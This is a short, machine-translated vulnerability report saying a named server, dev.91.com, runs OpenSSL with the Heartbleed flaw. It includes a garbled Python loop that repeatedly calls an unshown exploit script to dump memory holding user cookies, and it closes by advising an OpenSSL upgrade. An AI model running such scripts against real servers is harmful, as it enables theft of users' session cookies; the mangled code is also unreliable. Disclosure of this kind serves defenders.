91 a substation has the Heartbleed vulnerability to obtain user cookie information

91 a substation has the Heartbleed vulnerability to obtain user cookie information

The openssl version used by the dev.91.com server has the heartbleed vulnerability.

 

You can write a simple script to obtain the results in batches. The Code is as follows:

Import sysimport osimport timedef getvul (url): for x in range (3,100): cmd = "python sslopen. py "+ url +"> "+ str (x) + ". txt "time. sleep (15) try: OS. system (cmd) Partition T: passif _ name __= = "_ main _": if len (sys. argv )! = 2: print "usage: python openssl. py url" sys. exit () else: getvul (sys. argv [1])

This will generate many execution result files with a lot of cookie information,
 

Solution:

Use the openssl version that does not have the vulnerability.